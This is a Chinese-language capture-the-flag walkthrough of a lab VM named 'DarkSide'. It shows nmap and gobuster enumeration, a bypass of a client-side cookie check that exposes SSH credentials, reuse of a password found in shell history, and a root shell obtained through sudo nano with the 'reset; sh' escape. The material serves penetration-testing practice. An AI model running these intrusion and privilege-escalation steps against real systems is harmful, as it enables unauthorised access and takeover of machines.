信息搜集主机发现┌──(kali㉿kali)-[~] └─$ nmap -sn 192.168.2.0/24 Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-15 03:46 EDT Nmap scan report for darkside (192.168.2.19) Host is up (0.00023s latency). MAC Address: 08:00:27:3B:49:15 (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Nmap scan report for kali (192.168.2.12) Host is up. Nmap done: 256 IP addresses (9 hosts up) scanned in 2.75 seconds端口扫描┌──(kali㉿kali)-[~] └─$ nmap -A -p- 192.168.2.19 Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-15 03:47 EDT Nmap scan report for darkside (192.168.2.19) Host is up (0.00050s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5deb11u2 (protocol 2.0) | ssh-hostkey: | 3072 e0:25:46:8e:b8:bb:ba:69:69:1b:a7:4d:28:34:04:dd (RSA) | 256 60:12:04:69:5e:c4:a1:42:2d:2b:51:8a:57:fe:a8:8a (ECDSA) |_ 256 84:bb:60:b7:79:5d:09:9c:dd:24:23:a3:f2:65:89:3f (ED25519) 80/tcp open http Apache httpd 2.4.56 ((Debian)) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-server-header: Apache/2.4.56 (Debian) |_http-title: The DarkSide MAC Address: 08:00:27:3B:49:15 (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Device type: general purpose|router Running: Linux 4.X|5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.50 ms darkside (192.168.2.19) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.12 seconds漏洞利用看一下80端口有什么┌──(kali㉿kali)-[~] └─$ curl http://192.168.2.19 !DOCTYPE html html langen head meta charsetUTF-8 meta nameviewport contentwidthdevice-width, initial-scale1.0 link relstylesheet hrefstyles.css titleThe DarkSide/title /head body div classwelcome-message h1Welcome to the DarkSide/h1 /div div classmain form action methodPOST h1LOGIN/h1 labelUSERNAME/label input typetext nameuser labelPASSWORD/label input typepassword namepass button typesubmitLOGIN/button /form /div /body /html一个登录页面尝试目录扫描┌──(kali㉿kali)-[~] └─$ gobuster dir -u http://192.168.2.19 -w SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -x html,php,txt,jpg,png,zip,git Gobuster v3.6 by OJ Reeves (TheColonial) Christian Mehlmauer (firefart) [] Url: http://192.168.2.19 [] Method: GET [] Threads: 10 [] Wordlist: SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt [] Negative Status codes: 404 [] User Agent: gobuster/3.6 [] Extensions: txt,jpg,png,zip,git,html,php [] Timeout: 10s Starting gobuster in directory enumeration mode /.html (Status: 403) [Size: 277] /.php (Status: 403) [Size: 277] /index.php (Status: 200) [Size: 683] /backup (Status: 301) [Size: 313] [-- http://192.168.2.19/backup/] /.php (Status: 403) [Size: 277] /.html (Status: 403) [Size: 277] /server-status (Status: 403) [Size: 277] /logitech-quickcam_w0qqcatrefzc5qqfbdz1qqfclz3qqfposz95112qqfromzr14qqfrppz50qqfsclz1qqfsooz1qqfsopz1qqfssz0qqfstypez1qqftrtz1qqftrvz1qqftsz2qqnojsprzyqqpfidz0qqsaatcz1qqsacatzq2d1qqsacqyopzgeqqsacurz0qqsadisz200qqsaslopz1qqsofocuszbsqqsorefinesearchz1.html (Status: 403) [Size: 277] Progress: 9482032 / 9482040 (100.00%) Finished 有个/backup/目录目录下vote.txt文件rijaba: Yes xerosec: Yes sml: No cromiphi: No gatogamer: No chema: Yes talleyrand: No d3b0o: Yes Since the result was a draw, we will let you enter the darkside, or at least temporarily, good luck kevin.我们拿到了用户名尝试爆破登陆以后得到了一串字符串解码出了sfqekmgncutjhbypvxda.onion查看一下┌──(kali㉿kali)-[~] └─$ curl http://192.168.2.19/sfqekmgncutjhbypvxda.onion/ !DOCTYPE html html head titleWhich Side Are You On?/title style body { background-color: black; color: white; font-size: 24px; margin: 0; } /style /head body div pWhich Side Are You On?/p /div script var sideCookie document.cookie.match(/(^| )side([^;])/); if (sideCookie sideCookie[2] darkside) { window.location.href hwvhysntovtanj.password; } /script /body /html读取cookie side如果值 darkside 跳转到hwvhysntovtanj.password那我们可以直接访问 hwvhysntovtanj.password┌──(kali㉿kali)-[~] └─$ curl http://192.168.2.19/sfqekmgncutjhbypvxda.onion/hwvhysntovtanj.password kevin:ILoveCalisthenicsssh登录一下┌──(kali㉿kali)-[~] └─$ ssh kevin192.168.2.19 The authenticity of host 192.168.2.19 (192.168.2.19) cant be established. ED25519 key fingerprint is SHA256:pmPw9d2/o54jNDmo29Hq6rIzWOQ//VhyZvK4KN6rmk. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 192.168.2.19 (ED25519) to the list of known hosts. kevin192.168.2.19s password: Linux darkside 5.10.0-26-amd64 #1 SMP Debian 5.10.197-1 (2023-09-29) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Sun Oct 15 15:18:15 2023 from 10.0.2.18 kevindarkside:~$权限提升在.history发现了密码尝试一下kevindarkside:~$ cat .history ls -al hostname -I echo Congratulations on the OSCP Xerosec top ps -faux su rijaba ILoveJabita ls /home/rijaba kevindarkside:~$ su rijaba Password: rijabadarkside:/home/kevin$ id uid1001(rijaba) gid1001(rijaba) groups1001(rijaba)进入nano按CTRLRCTRLX输入reset; sh 10 20就提权成功了rijabadarkside:~$ sudo -l Matching Defaults entries for rijaba on darkside: env_reset, mail_badpass, secure_path/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User rijaba may run the following commands on darkside: (root) NOPASSWD: /usr/bin/nano # id uid0(root) gid0(root) groups0(root)